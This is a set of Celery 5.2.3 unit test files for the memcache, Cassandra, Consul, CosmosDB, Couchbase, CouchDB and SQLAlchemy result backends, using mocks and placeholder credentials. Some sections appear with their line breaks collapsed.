@pytest.mark.masked_modules('pylibmc', 'memcache') def test_no_implementations(self, mask_modules): with conftest.reset_modules('celery.backends.cache'): from celery.backends import cache cache._imp = [None] with pytest.raises(ImproperlyConfigured): cache.get_best_memcache() def test_cached(self): with self.mock_pylibmc(): with conftest.reset_modules('celery.backends.cache'): from celery.backends import cache cache._imp = [None] cache.get_best_memcache()[0](behaviors={'foo': 'bar'}) assert cache._imp[0] cache.get_best_memcache()[0]() def test_backends(self): from celery.backends.cache import backends with self.mock_memcache(): for name, fun in backends.items(): assert fun() class test_memcache_key(MockCacheMixin): @pytest.mark.masked_modules('pylibmc') def test_memcache_unicode_key(self, mask_modules): with self.mock_memcache(): with conftest.reset_modules('celery.backends.cache'): from celery.backends import cache cache._imp = [None] task_id, result = str(uuid()), 42 b = cache.CacheBackend(backend='memcache', app=self.app) b.store_result(task_id, result, state=states.SUCCESS) assert b.get_result(task_id) == result @pytest.mark.masked_modules('pylibmc') def test_memcache_bytes_key(self, mask_modules): with self.mock_memcache(): with conftest.reset_modules('celery.backends.cache'): from celery.backends import cache cache._imp = [None] task_id, result = str_to_bytes(uuid()), 42 b = cache.CacheBackend(backend='memcache', app=self.app) b.store_result(task_id, result, state=states.SUCCESS) assert b.get_result(task_id) == result def test_pylibmc_unicode_key(self): with conftest.reset_modules('celery.backends.cache'): with self.mock_pylibmc(): from celery.backends import cache cache._imp = [None] task_id, result = str(uuid()), 42 b = cache.CacheBackend(backend='memcache', app=self.app) b.store_result(task_id, result, state=states.SUCCESS) assert b.get_result(task_id) == result def test_pylibmc_bytes_key(self): with conftest.reset_modules('celery.backends.cache'): with self.mock_pylibmc(): from celery.backends import cache cache._imp = [None] task_id, result = str_to_bytes(uuid()), 42 b = cache.CacheBackend(backend='memcache', app=self.app) b.store_result(task_id, result, state=states.SUCCESS) assert b.get_result(task_id) == result 

# File: celery-5.2.3/t/unit/backends/test_cassandra.py

from datetime import datetime
from pickle import dumps, loads
from unittest.mock import Mock

import pytest

from celery import states
from celery.exceptions import ImproperlyConfigured
from celery.utils.objects import Bunch

CASSANDRA_MODULES = [
    'cassandra',
    'cassandra.auth',
    'cassandra.cluster',
    'cassandra.query',
]


class test_CassandraBackend:

    def setup(self):
        self.app.conf.update(
            cassandra_servers=['example.com'],
            cassandra_keyspace='celery',
            cassandra_table='task_results',
        )

    @pytest.mark.patched_module(*CASSANDRA_MODULES)
    def test_init_no_cassandra(self, module):
        # should raise ImproperlyConfigured when no python-driver
        # installed.
        from celery.backends import cassandra as mod
        prev, mod.cassandra = mod.cassandra, None
        try:
            with pytest.raises(ImproperlyConfigured):
                mod.CassandraBackend(app=self.app)
        finally:
            mod.cassandra = prev

    @pytest.mark.patched_module(*CASSANDRA_MODULES)
    def test_init_with_and_without_LOCAL_QUORUM(self, module):
        from celery.backends import cassandra as mod
        mod.cassandra = Mock()
        cons = mod.cassandra.ConsistencyLevel = Bunch(
            LOCAL_QUORUM='foo',
        )
        self.app.conf.cassandra_read_consistency = 'LOCAL_FOO'
        self.app.conf.cassandra_write_consistency = 'LOCAL_FOO'
        mod.CassandraBackend(app=self.app)
        cons.LOCAL_FOO = 'bar'
        mod.CassandraBackend(app=self.app)

        # no servers raises ImproperlyConfigured
        with pytest.raises(ImproperlyConfigured):
            self.app.conf.cassandra_servers = None
            mod.CassandraBackend(
                app=self.app, keyspace='b', column_family='c',
            )

    @pytest.mark.patched_module(*CASSANDRA_MODULES)
    @pytest.mark.usefixtures('depends_on_current_app')
    def test_reduce(self, module):
        from celery.backends.cassandra import CassandraBackend
        assert loads(dumps(CassandraBackend(app=self.app)))

    @pytest.mark.patched_module(*CASSANDRA_MODULES)
    def test_get_task_meta_for(self, module):
        from celery.backends import cassandra as mod
        mod.cassandra = Mock()
        x = mod.CassandraBackend(app=self.app)
        session = x._session = Mock()
        execute = session.execute = Mock()
        result_set = Mock()
        result_set.one.return_value = [
            states.SUCCESS, '1', datetime.now(), b'', b''
        ]
        execute.return_value = result_set
        x.decode = Mock()
        meta = x._get_task_meta_for('task_id')
        assert meta['status'] == states.SUCCESS

        result_set.one.return_value = []
        x._session.execute.return_value = result_set
        meta = x._get_task_meta_for('task_id')
        assert meta['status'] == states.PENDING

    def test_as_uri(self):
        # Just ensure as_uri works properly
        from celery.backends import cassandra as mod
        mod.cassandra = Mock()
        x = mod.CassandraBackend(app=self.app)
        x.as_uri()
        x.as_uri(include_password=False)

    @pytest.mark.patched_module(*CASSANDRA_MODULES)
    def test_store_result(self, module):
        from celery.backends import cassandra as mod
        mod.cassandra = Mock()
        x = mod.CassandraBackend(app=self.app)
        session = x._session = Mock()
        session.execute = Mock()
        x._store_result('task_id', 'result', states.SUCCESS)

    def test_timeouting_cluster(self):
        # Tests behavior when Cluster.connect raises
        # cassandra.OperationTimedOut.
from celery.backends import cassandra as mod class OTOExc(Exception): pass class VeryFaultyCluster: def __init__(self, *args, **kwargs): pass def connect(self, *args, **kwargs): raise OTOExc() def shutdown(self): pass mod.cassandra = Mock() mod.cassandra.OperationTimedOut = OTOExc mod.cassandra.cluster = Mock() mod.cassandra.cluster.Cluster = VeryFaultyCluster x = mod.CassandraBackend(app=self.app) with pytest.raises(OTOExc): x._store_result('task_id', 'result', states.SUCCESS) assert x._cluster is None assert x._session is None def test_create_result_table(self): # Tests behavior when session.execute raises # cassandra.AlreadyExists. from celery.backends import cassandra as mod class OTOExc(Exception): pass class FaultySession: def __init__(self, *args, **kwargs): pass def execute(self, *args, **kwargs): raise OTOExc() class DummyCluster: def __init__(self, *args, **kwargs): pass def connect(self, *args, **kwargs): return FaultySession() mod.cassandra = Mock() mod.cassandra.cluster = Mock() mod.cassandra.cluster.Cluster = DummyCluster mod.cassandra.AlreadyExists = OTOExc x = mod.CassandraBackend(app=self.app) x._get_connection(write=True) assert x._session is not None def test_init_session(self): # Tests behavior when Cluster.connect works properly from celery.backends import cassandra as mod class DummyCluster: def __init__(self, *args, **kwargs): pass def connect(self, *args, **kwargs): return Mock() mod.cassandra = Mock() mod.cassandra.cluster = Mock() mod.cassandra.cluster.Cluster = DummyCluster x = mod.CassandraBackend(app=self.app) assert x._session is None x._get_connection(write=True) assert x._session is not None s = x._session x._get_connection() assert s is x._session def test_auth_provider(self): # Ensure valid auth_provider works properly, and invalid one raises # ImproperlyConfigured exception. 
        from celery.backends import cassandra as mod

        class DummyAuth:
            ValidAuthProvider = Mock()

        mod.cassandra = Mock()
        mod.cassandra.auth = DummyAuth

        # Valid auth_provider
        self.app.conf.cassandra_auth_provider = 'ValidAuthProvider'
        self.app.conf.cassandra_auth_kwargs = {'username': 'stuff'}
        mod.CassandraBackend(app=self.app)

        # Invalid auth_provider
        self.app.conf.cassandra_auth_provider = 'SpiderManAuth'
        self.app.conf.cassandra_auth_kwargs = {'username': 'Jack'}
        with pytest.raises(ImproperlyConfigured):
            mod.CassandraBackend(app=self.app)

    def test_options(self):
        # Ensure valid options works properly
        from celery.backends import cassandra as mod
        mod.cassandra = Mock()

        # Valid options
        self.app.conf.cassandra_options = {
            'cql_version': '3.2.1',
            'protocol_version': 3
        }
        mod.CassandraBackend(app=self.app)


# File: celery-5.2.3/t/unit/backends/test_consul.py

from unittest.mock import Mock

import pytest

from celery.backends.consul import ConsulBackend

pytest.importorskip('consul')


class test_ConsulBackend:

    def setup(self):
        self.backend = ConsulBackend(
            app=self.app, url='consul://localhost:800')

    def test_supports_autoexpire(self):
        assert self.backend.supports_autoexpire

    def test_consul_consistency(self):
        assert self.backend.consistency == 'consistent'

    def test_get(self):
        index = 100
        data = {'Key': 'test-consul-1', 'Value': 'mypayload'}
        self.backend.one_client = Mock(name='c.client')
        self.backend.one_client.kv.get.return_value = (index, data)
        assert self.backend.get(data['Key']) == 'mypayload'

    def test_set(self):
        self.backend.one_client = Mock(name='c.client')
        self.backend.one_client.session.create.return_value = 'c8dfa770-4ea3-2ee9-d141-98cf0bfe9c59'
        self.backend.one_client.kv.put.return_value = True
        assert self.backend.set('Key', 'Value') is True

    def test_delete(self):
        self.backend.one_client = Mock(name='c.client')
        self.backend.one_client.kv.delete.return_value = True
        assert self.backend.delete('Key') is True

    def test_index_bytes_key(self):
        key = 'test-consul-2'
        assert self.backend._key_to_consul_key(key) == key
        assert self.backend._key_to_consul_key(key.encode('utf-8')) == key


# File: celery-5.2.3/t/unit/backends/test_cosmosdbsql.py

from unittest.mock import Mock, call, patch

import pytest

from celery import states
from celery.backends import cosmosdbsql
from celery.backends.cosmosdbsql import CosmosDBSQLBackend
from celery.exceptions import ImproperlyConfigured

MODULE_TO_MOCK = "celery.backends.cosmosdbsql"

pytest.importorskip('pydocumentdb')


class test_DocumentDBBackend:

    def setup(self):
        self.url = "cosmosdbsql://:key@endpoint"
        self.backend = CosmosDBSQLBackend(app=self.app, url=self.url)

    def test_missing_third_party_sdk(self):
        pydocumentdb = cosmosdbsql.pydocumentdb
        try:
            cosmosdbsql.pydocumentdb = None
            with pytest.raises(ImproperlyConfigured):
                CosmosDBSQLBackend(app=self.app, url=self.url)
        finally:
            cosmosdbsql.pydocumentdb = pydocumentdb

    def test_bad_connection_url(self):
        with pytest.raises(ImproperlyConfigured):
            CosmosDBSQLBackend._parse_url(
                "cosmosdbsql://:key@")
        with pytest.raises(ImproperlyConfigured):
            CosmosDBSQLBackend._parse_url(
                "cosmosdbsql://:@host")
        with pytest.raises(ImproperlyConfigured):
            CosmosDBSQLBackend._parse_url(
"cosmosdbsql://corrupted") def test_default_connection_url(self): endpoint, password = CosmosDBSQLBackend._parse_url( "cosmosdbsql://:key@host") assert password == "key" assert endpoint == "https://host:443" endpoint, password = CosmosDBSQLBackend._parse_url( "cosmosdbsql://:key@host:443") assert password == "key" assert endpoint == "https://host:443" endpoint, password = CosmosDBSQLBackend._parse_url( "cosmosdbsql://:key@host:8080") assert password == "key" assert endpoint == "http://host:8080" def test_bad_partition_key(self): with pytest.raises(ValueError): CosmosDBSQLBackend._get_partition_key("") with pytest.raises(ValueError): CosmosDBSQLBackend._get_partition_key(" ") with pytest.raises(ValueError): CosmosDBSQLBackend._get_partition_key(None) def test_bad_consistency_level(self): with pytest.raises(ImproperlyConfigured): CosmosDBSQLBackend(app=self.app, url=self.url, consistency_level="DoesNotExist") @patch(MODULE_TO_MOCK + ".DocumentClient") def test_create_client(self, mock_factory): mock_instance = Mock() mock_factory.return_value = mock_instance backend = CosmosDBSQLBackend(app=self.app, url=self.url) # ensure database and collection get created on client access... assert mock_instance.CreateDatabase.call_count == 0 assert mock_instance.CreateCollection.call_count == 0 assert backend._client is not None assert mock_instance.CreateDatabase.call_count == 1 assert mock_instance.CreateCollection.call_count == 1 # ...but only once per backend instance assert backend._client is not None assert mock_instance.CreateDatabase.call_count == 1 assert mock_instance.CreateCollection.call_count == 1 @patch(MODULE_TO_MOCK + ".CosmosDBSQLBackend._client") def test_get(self, mock_client): self.backend.get(b"mykey") mock_client.ReadDocument.assert_has_calls( [call("dbs/celerydb/colls/celerycol/docs/mykey", {"partitionKey": "mykey"}), call().get("value")]) @patch(MODULE_TO_MOCK + ".CosmosDBSQLBackend._client") def test_get_missing(self, mock_client): mock_client.ReadDocument.side_effect = \ cosmosdbsql.HTTPFailure(cosmosdbsql.ERROR_NOT_FOUND) assert self.backend.get(b"mykey") is None @patch(MODULE_TO_MOCK + ".CosmosDBSQLBackend._client") def test_set(self, mock_client): self.backend._set_with_state(b"mykey", "myvalue", states.SUCCESS) mock_client.CreateDocument.assert_called_once_with( "dbs/celerydb/colls/celerycol", {"id": "mykey", "value": "myvalue"}, {"partitionKey": "mykey"}) @patch(MODULE_TO_MOCK + ".CosmosDBSQLBackend._client") def test_mget(self, mock_client): keys = [b"mykey1", b"mykey2"] self.backend.mget(keys) mock_client.ReadDocument.assert_has_calls( [call("dbs/celerydb/colls/celerycol/docs/mykey1", {"partitionKey": "mykey1"}), call().get("value"), call("dbs/celerydb/colls/celerycol/docs/mykey2", {"partitionKey": "mykey2"}), call().get("value")]) @patch(MODULE_TO_MOCK + ".CosmosDBSQLBackend._client") def test_delete(self, mock_client): self.backend.delete(b"mykey") mock_client.DeleteDocument.assert_called_once_with( "dbs/celerydb/colls/celerycol/docs/mykey", {"partitionKey": "mykey"}) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/backends/test_couchbase.py0000664000175000017500000001134700000000000021244 0ustar00asifasif00000000000000"""Tests for the CouchbaseBackend.""" from datetime import timedelta from unittest.mock import MagicMock, Mock, patch, sentinel import pytest from celery import states from celery.app import backends from celery.backends import couchbase as module from 
celery.backends.couchbase import CouchbaseBackend from celery.exceptions import ImproperlyConfigured try: import couchbase except ImportError: couchbase = None COUCHBASE_BUCKET = 'celery_bucket' pytest.importorskip('couchbase') class test_CouchbaseBackend: def setup(self): self.backend = CouchbaseBackend(app=self.app) def test_init_no_couchbase(self): prev, module.Cluster = module.Cluster, None try: with pytest.raises(ImproperlyConfigured): CouchbaseBackend(app=self.app) finally: module.Cluster = prev def test_init_no_settings(self): self.app.conf.couchbase_backend_settings = [] with pytest.raises(ImproperlyConfigured): CouchbaseBackend(app=self.app) def test_init_settings_is_None(self): self.app.conf.couchbase_backend_settings = None CouchbaseBackend(app=self.app) def test_get_connection_connection_exists(self): with patch('couchbase.cluster.Cluster') as mock_Cluster: self.backend._connection = sentinel._connection connection = self.backend._get_connection() assert sentinel._connection == connection mock_Cluster.assert_not_called() def test_get(self): self.app.conf.couchbase_backend_settings = {} x = CouchbaseBackend(app=self.app) x._connection = Mock() mocked_get = x._connection.get = Mock() mocked_get.return_value.content = sentinel.retval # should return None assert x.get('1f3fab') == sentinel.retval x._connection.get.assert_called_once_with('1f3fab') def test_set_no_expires(self): self.app.conf.couchbase_backend_settings = None x = CouchbaseBackend(app=self.app) x.expires = None x._connection = MagicMock() x._connection.set = MagicMock() # should return None assert x._set_with_state(sentinel.key, sentinel.value, states.SUCCESS) is None def test_set_expires(self): self.app.conf.couchbase_backend_settings = None x = CouchbaseBackend(app=self.app, expires=30) assert x.expires == 30 x._connection = MagicMock() x._connection.set = MagicMock() # should return None assert x._set_with_state(sentinel.key, sentinel.value, states.SUCCESS) is None def test_delete(self): self.app.conf.couchbase_backend_settings = {} x = CouchbaseBackend(app=self.app) x._connection = Mock() mocked_delete = x._connection.remove = Mock() mocked_delete.return_value = None # should return None assert x.delete('1f3fab') is None x._connection.remove.assert_called_once_with('1f3fab') def test_config_params(self): self.app.conf.couchbase_backend_settings = { 'bucket': 'mycoolbucket', 'host': ['here.host.com', 'there.host.com'], 'username': 'johndoe', 'password': 'mysecret', 'port': '1234', } x = CouchbaseBackend(app=self.app) assert x.bucket == 'mycoolbucket' assert x.host == ['here.host.com', 'there.host.com'] assert x.username == 'johndoe' assert x.password == 'mysecret' assert x.port == 1234 def test_backend_by_url(self, url='couchbase://myhost/mycoolbucket'): from celery.backends.couchbase import CouchbaseBackend backend, url_ = backends.by_url(url, self.app.loader) assert backend is CouchbaseBackend assert url_ == url def test_backend_params_by_url(self): url = 'couchbase://johndoe:mysecret@myhost:123/mycoolbucket' with self.Celery(backend=url) as app: x = app.backend assert x.bucket == 'mycoolbucket' assert x.host == 'myhost' assert x.username == 'johndoe' assert x.password == 'mysecret' assert x.port == 123 def test_expires_defaults_to_config(self): self.app.conf.result_expires = 10 b = CouchbaseBackend(expires=None, app=self.app) assert b.expires == 10 def test_expires_is_int(self): b = CouchbaseBackend(expires=48, app=self.app) assert b.expires == 48 def test_expires_is_None(self): b = 
            CouchbaseBackend(expires=None, app=self.app)
        assert b.expires == self.app.conf.result_expires.total_seconds()

    def test_expires_is_timedelta(self):
        b = CouchbaseBackend(expires=timedelta(minutes=1), app=self.app)
        assert b.expires == 60


# File: celery-5.2.3/t/unit/backends/test_couchdb.py

from unittest.mock import MagicMock, Mock, sentinel

import pytest

from celery import states
from celery.app import backends
from celery.backends import couchdb as module
from celery.backends.couchdb import CouchBackend
from celery.exceptions import ImproperlyConfigured

try:
    import pycouchdb
except ImportError:
    pycouchdb = None

COUCHDB_CONTAINER = 'celery_container'

pytest.importorskip('pycouchdb')


class test_CouchBackend:

    def setup(self):
        self.Server = self.patching('pycouchdb.Server')
        self.backend = CouchBackend(app=self.app)

    def test_init_no_pycouchdb(self):
        """test init no pycouchdb raises"""
        prev, module.pycouchdb = module.pycouchdb, None
        try:
            with pytest.raises(ImproperlyConfigured):
                CouchBackend(app=self.app)
        finally:
            module.pycouchdb = prev

    def test_get_container_exists(self):
        self.backend._connection = sentinel._connection
        connection = self.backend.connection
        assert connection is sentinel._connection
        self.Server.assert_not_called()

    def test_get(self):
        """test_get

        CouchBackend.get should return and take two params
        db conn to couchdb is mocked.
        """
        x = CouchBackend(app=self.app)
        x._connection = Mock()
        get = x._connection.get = MagicMock()
        assert x.get('1f3fab') == get.return_value['value']
        x._connection.get.assert_called_once_with('1f3fab')

    def test_get_non_existent_key(self):
        x = CouchBackend(app=self.app)
        x._connection = Mock()
        get = x._connection.get = MagicMock()
        get.side_effect = pycouchdb.exceptions.NotFound
        assert x.get('1f3fab') is None
        x._connection.get.assert_called_once_with('1f3fab')

    @pytest.mark.parametrize("key", ['1f3fab', b'1f3fab'])
    def test_set(self, key):
        x = CouchBackend(app=self.app)
        x._connection = Mock()
        x._set_with_state(key, 'value', states.SUCCESS)
        x._connection.save.assert_called_once_with(
            {'_id': '1f3fab', 'value': 'value'})

    @pytest.mark.parametrize("key", ['1f3fab', b'1f3fab'])
    def test_set_with_conflict(self, key):
        x = CouchBackend(app=self.app)
        x._connection = Mock()
        x._connection.save.side_effect = (pycouchdb.exceptions.Conflict, None)
        get = x._connection.get = MagicMock()
        x._set_with_state(key, 'value', states.SUCCESS)
        x._connection.get.assert_called_once_with('1f3fab')
        x._connection.get('1f3fab').__setitem__.assert_called_once_with(
            'value', 'value')
        x._connection.save.assert_called_with(get('1f3fab'))
        assert x._connection.save.call_count == 2

    def test_delete(self):
        """test_delete

        CouchBackend.delete should return and take two params
        db conn to pycouchdb is mocked.
        TODO Should test on key not exists
        """
        x = CouchBackend(app=self.app)
        x._connection = Mock()
        mocked_delete = x._connection.delete = Mock()
        mocked_delete.return_value = None
        # should return None
        assert x.delete('1f3fab') is None
        x._connection.delete.assert_called_once_with('1f3fab')

    def test_backend_by_url(self, url='couchdb://myhost/mycoolcontainer'):
        from celery.backends.couchdb import CouchBackend
        backend, url_ = backends.by_url(url, self.app.loader)
        assert backend is CouchBackend
        assert url_ == url

    def test_backend_params_by_url(self):
        url = 'couchdb://johndoe:mysecret@myhost:123/mycoolcontainer'
        with self.Celery(backend=url) as app:
            x = app.backend
            assert x.container == 'mycoolcontainer'
            assert x.host == 'myhost'
            assert x.username == 'johndoe'
            assert x.password == 'mysecret'
            assert x.port == 123


# File: celery-5.2.3/t/unit/backends/test_database.py

from datetime import datetime
from pickle import dumps, loads
from unittest.mock import Mock, patch

import pytest

from celery import states, uuid
from celery.app.task import Context
from celery.exceptions import ImproperlyConfigured

pytest.importorskip('sqlalchemy')

from celery.backends.database import (DatabaseBackend, retry, session,  # noqa
                                      session_cleanup)
from celery.backends.database.models import Task, TaskSet  # noqa
from celery.backends.database.session import (  # noqa
    PREPARE_MODELS_MAX_RETRIES, ResultModelBase, SessionManager)
from t import skip  # noqa


class SomeClass:

    def __init__(self, data):
        self.data = data

    def __eq__(self, cmp):
        return self.data == cmp.data


class test_session_cleanup:

    def test_context(self):
        session = Mock(name='session')
        with session_cleanup(session):
            pass
        session.close.assert_called_with()

    def test_context_raises(self):
        session = Mock(name='session')
        with pytest.raises(KeyError):
            with session_cleanup(session):
                raise KeyError()
        session.rollback.assert_called_with()
        session.close.assert_called_with()


@skip.if_pypy
class test_DatabaseBackend:

    def setup(self):
        self.uri = 'sqlite:///test.db'
        self.app.conf.result_serializer = 'pickle'

    def test_retry_helper(self):
        from celery.backends.database import DatabaseError

        calls = [0]

        @retry
        def raises():
            calls[0] += 1
            raise DatabaseError(1, 2, 3)

        with pytest.raises(DatabaseError):
            raises(max_retries=5)

        assert calls[0] == 5

    def test_missing_dburi_raises_ImproperlyConfigured(self):
        self.app.conf.database_url = None
        with pytest.raises(ImproperlyConfigured):
            DatabaseBackend(app=self.app)

    def test_table_schema_config(self):
        self.app.conf.database_table_schemas = {
            'task': 'foo',
            'group': 'bar',
        }
        tb = DatabaseBackend(self.uri, app=self.app)
        assert tb.task_cls.__table__.schema == 'foo'
        assert tb.task_cls.__table__.c.id.default.schema == 'foo'
        assert tb.taskset_cls.__table__.schema == 'bar'
        assert tb.taskset_cls.__table__.c.id.default.schema == 'bar'

    def test_table_name_config(self):
        self.app.conf.database_table_names = {
            'task': 'foo',
            'group': 'bar',
        }
        tb = DatabaseBackend(self.uri, app=self.app)
        assert tb.task_cls.__table__.name == 'foo'
        assert tb.taskset_cls.__table__.name == 'bar'

    def test_missing_task_id_is_PENDING(self):
        tb = DatabaseBackend(self.uri, app=self.app)
        assert tb.get_state('xxx-does-not-exist') == states.PENDING

    def test_missing_task_meta_is_dict_with_pending(self):
        tb = DatabaseBackend(self.uri, app=self.app)
        meta = tb.get_task_meta('xxx-does-not-exist-at-all')
        assert meta['status'] ==
states.PENDING assert meta['task_id'] == 'xxx-does-not-exist-at-all' assert meta['result'] is None assert meta['traceback'] is None def test_mark_as_done(self): tb = DatabaseBackend(self.uri, app=self.app) tid = uuid() assert tb.get_state(tid) == states.PENDING assert tb.get_result(tid) is None tb.mark_as_done(tid, 42) assert tb.get_state(tid) == states.SUCCESS assert tb.get_result(tid) == 42 def test_is_pickled(self): tb = DatabaseBackend(self.uri, app=self.app) tid2 = uuid() result = {'foo': 'baz', 'bar': SomeClass(12345)} tb.mark_as_done(tid2, result) # is serialized properly. rindb = tb.get_result(tid2) assert rindb.get('foo') == 'baz' assert rindb.get('bar').data == 12345 def test_mark_as_started(self): tb = DatabaseBackend(self.uri, app=self.app) tid = uuid() tb.mark_as_started(tid) assert tb.get_state(tid) == states.STARTED def test_mark_as_revoked(self): tb = DatabaseBackend(self.uri, app=self.app) tid = uuid() tb.mark_as_revoked(tid) assert tb.get_state(tid) == states.REVOKED def test_mark_as_retry(self): tb = DatabaseBackend(self.uri, app=self.app) tid = uuid() try: raise KeyError('foo') except KeyError as exception: import traceback trace = '\n'.join(traceback.format_stack()) tb.mark_as_retry(tid, exception, traceback=trace) assert tb.get_state(tid) == states.RETRY assert isinstance(tb.get_result(tid), KeyError) assert tb.get_traceback(tid) == trace def test_mark_as_failure(self): tb = DatabaseBackend(self.uri, app=self.app) tid3 = uuid() try: raise KeyError('foo') except KeyError as exception: import traceback trace = '\n'.join(traceback.format_stack()) tb.mark_as_failure(tid3, exception, traceback=trace) assert tb.get_state(tid3) == states.FAILURE assert isinstance(tb.get_result(tid3), KeyError) assert tb.get_traceback(tid3) == trace def test_forget(self): tb = DatabaseBackend(self.uri, backend='memory://', app=self.app) tid = uuid() tb.mark_as_done(tid, {'foo': 'bar'}) tb.mark_as_done(tid, {'foo': 'bar'}) x = self.app.AsyncResult(tid, backend=tb) x.forget() assert x.result is None def test_process_cleanup(self): tb = DatabaseBackend(self.uri, app=self.app) tb.process_cleanup() @pytest.mark.usefixtures('depends_on_current_app') def test_reduce(self): tb = DatabaseBackend(self.uri, app=self.app) assert loads(dumps(tb)) def test_save__restore__delete_group(self): tb = DatabaseBackend(self.uri, app=self.app) tid = uuid() res = {'something': 'special'} assert tb.save_group(tid, res) == res res2 = tb.restore_group(tid) assert res2 == res tb.delete_group(tid) assert tb.restore_group(tid) is None assert tb.restore_group('xxx-nonexisting-id') is None def test_cleanup(self): tb = DatabaseBackend(self.uri, app=self.app) for i in range(10): tb.mark_as_done(uuid(), 42) tb.save_group(uuid(), {'foo': 'bar'}) s = tb.ResultSession() for t in s.query(Task).all(): t.date_done = datetime.now() - tb.expires * 2 for t in s.query(TaskSet).all(): t.date_done = datetime.now() - tb.expires * 2 s.commit() s.close() tb.cleanup() def test_Task__repr__(self): assert 'foo' in repr(Task('foo')) def test_TaskSet__repr__(self): assert 'foo', repr(TaskSet('foo' in None)) @skip.if_pypy class test_DatabaseBackend_result_extended(): def setup(self): self.uri = 'sqlite:///test.db' self.app.conf.result_serializer = 'pickle' self.app.conf.result_extended = True @pytest.mark.parametrize( 'result_serializer, args, kwargs', [ ('pickle', (SomeClass(1), SomeClass(2)), {'foo': SomeClass(123)}), ('json', ['a', 'b'], {'foo': 'bar'}), ], ids=['using pickle', 'using json'] ) def test_store_result(self, result_serializer, 
args, kwargs): self.app.conf.result_serializer = result_serializer tb = DatabaseBackend(self.uri, app=self.app) tid = uuid() request = Context(args=args, kwargs=kwargs, task='mytask', retries=2, hostname='celery@worker_1', delivery_info={'routing_key': 'celery'}) tb.store_result(tid, {'fizz': 'buzz'}, states.SUCCESS, request=request) meta = tb.get_task_meta(tid) assert meta['result'] == {'fizz': 'buzz'} assert meta['args'] == args assert meta['kwargs'] == kwargs assert meta['queue'] == 'celery' assert meta['name'] == 'mytask' assert meta['retries'] == 2 assert meta['worker'] == "celery@worker_1" @pytest.mark.parametrize( 'result_serializer, args, kwargs', [ ('pickle', (SomeClass(1), SomeClass(2)), {'foo': SomeClass(123)}), ('json', ['a', 'b'], {'foo': 'bar'}), ], ids=['using pickle', 'using json'] ) def test_store_none_result(self, result_serializer, args, kwargs): self.app.conf.result_serializer = result_serializer tb = DatabaseBackend(self.uri, app=self.app) tid = uuid() request = Context(args=args, kwargs=kwargs, task='mytask', retries=2, hostname='celery@worker_1', delivery_info={'routing_key': 'celery'}) tb.store_result(tid, None, states.SUCCESS, request=request) meta = tb.get_task_meta(tid) assert meta['result'] is None assert meta['args'] == args assert meta['kwargs'] == kwargs assert meta['queue'] == 'celery' assert meta['name'] == 'mytask' assert meta['retries'] == 2 assert meta['worker'] == "celery@worker_1" @pytest.mark.parametrize( 'result_serializer, args, kwargs', [ ('pickle', (SomeClass(1), SomeClass(2)), {'foo': SomeClass(123)}), ('json', ['a', 'b'], {'foo': 'bar'}), ], ids=['using pickle', 'using json'] ) def test_get_result_meta(self, result_serializer, args, kwargs): self.app.conf.result_serializer = result_serializer tb = DatabaseBackend(self.uri, app=self.app) request = Context(args=args, kwargs=kwargs, task='mytask', retries=2, hostname='celery@worker_1', delivery_info={'routing_key': 'celery'}) meta = tb._get_result_meta(result={'fizz': 'buzz'}, state=states.SUCCESS, traceback=None, request=request, format_date=False, encode=True) assert meta['result'] == {'fizz': 'buzz'} assert tb.decode(meta['args']) == args assert tb.decode(meta['kwargs']) == kwargs assert meta['queue'] == 'celery' assert meta['name'] == 'mytask' assert meta['retries'] == 2 assert meta['worker'] == "celery@worker_1" @pytest.mark.parametrize( 'result_serializer, args, kwargs', [ ('pickle', (SomeClass(1), SomeClass(2)), {'foo': SomeClass(123)}), ('json', ['a', 'b'], {'foo': 'bar'}), ], ids=['using pickle', 'using json'] ) def test_get_result_meta_with_none(self, result_serializer, args, kwargs): self.app.conf.result_serializer = result_serializer tb = DatabaseBackend(self.uri, app=self.app) request = Context(args=args, kwargs=kwargs, task='mytask', retries=2, hostname='celery@worker_1', delivery_info={'routing_key': 'celery'}) meta = tb._get_result_meta(result=None, state=states.SUCCESS, traceback=None, request=request, format_date=False, encode=True) assert meta['result'] is None assert tb.decode(meta['args']) == args assert tb.decode(meta['kwargs']) == kwargs assert meta['queue'] == 'celery' assert meta['name'] == 'mytask' assert meta['retries'] == 2 assert meta['worker'] == "celery@worker_1" class test_SessionManager: def test_after_fork(self): s = SessionManager() assert not s.forked s._after_fork() assert s.forked @patch('celery.backends.database.session.create_engine') def test_get_engine_forked(self, create_engine): s = SessionManager() s._after_fork() engine = s.get_engine('dburi', foo=1) 
        create_engine.assert_called_with('dburi', foo=1)
        assert engine is create_engine()
        engine2 = s.get_engine('dburi', foo=1)
        assert engine2 is engine

    @patch('celery.backends.database.session.create_engine')
    def test_get_engine_kwargs(self, create_engine):
        s = SessionManager()
        engine = s.get_engine('dbur', foo=1, pool_size=5)
        assert engine is create_engine()
        engine2 = s.get_engine('dburi', foo=1)
        assert engine2 is engine

    @patch('celery.backends.database.session.sessionmaker')
    def test_create_session_forked(self, sessionmaker):
        s = SessionManager()
        s.get_engine = Mock(name='get_engine')
        s._after_fork()
        engine, session = s.create_session('dburi', short_lived_sessions=True)
        sessionmaker.assert_called_with(bind=s.get_engine())
        assert session is sessionmaker()
        sessionmaker.return_value = Mock(name='new')
        engine, session2 = s.create_session('dburi', short_lived_sessions=True)
        sessionmaker.assert_called_with(bind=s.get_engine())
        assert session2 is not session
        sessionmaker.return_value = Mock(name='new2')
        engine, session3 = s.create_session(
            'dburi', short_lived_sessions=False)
        sessionmaker.assert_called_with(bind=s.get_engine())
        assert session3 is session2

    def test_coverage_madness(self):
        prev, session.register_after_fork = (
            session.register_after_fork, None,
        )
        try:
            SessionManager()
        finally:
            session.register_after_fork = prev

    @patch('celery.backends.database.session.create_engine')
    def test_prepare_models_terminates(self, create_engine):
        """SessionManager.prepare_models has retry logic because the
        creation of database tables by multiple workers is racy.

        This test patches the used method to always raise, so we can
        verify that it does eventually terminate.
        """
        from sqlalchemy.dialects.sqlite import dialect
        from sqlalchemy.exc import DatabaseError

        sqlite = dialect.dbapi()
        manager = SessionManager()
        engine = manager.get_engine('dburi')

        def raise_err(bind):
            raise DatabaseError("", "", [], sqlite.DatabaseError)

        patch_create_all = patch.object(
            ResultModelBase.metadata, 'create_all', side_effect=raise_err)

        with pytest.raises(DatabaseError), patch_create_all as mock_create_all:
            manager.prepare_models(engine)

        assert mock_create_all.call_count == PREPARE_MODELS_MAX_RETRIES + 1


# File: celery-5.2.3/t/unit/backends/test_dynamodb.py

from decimal import Decimal
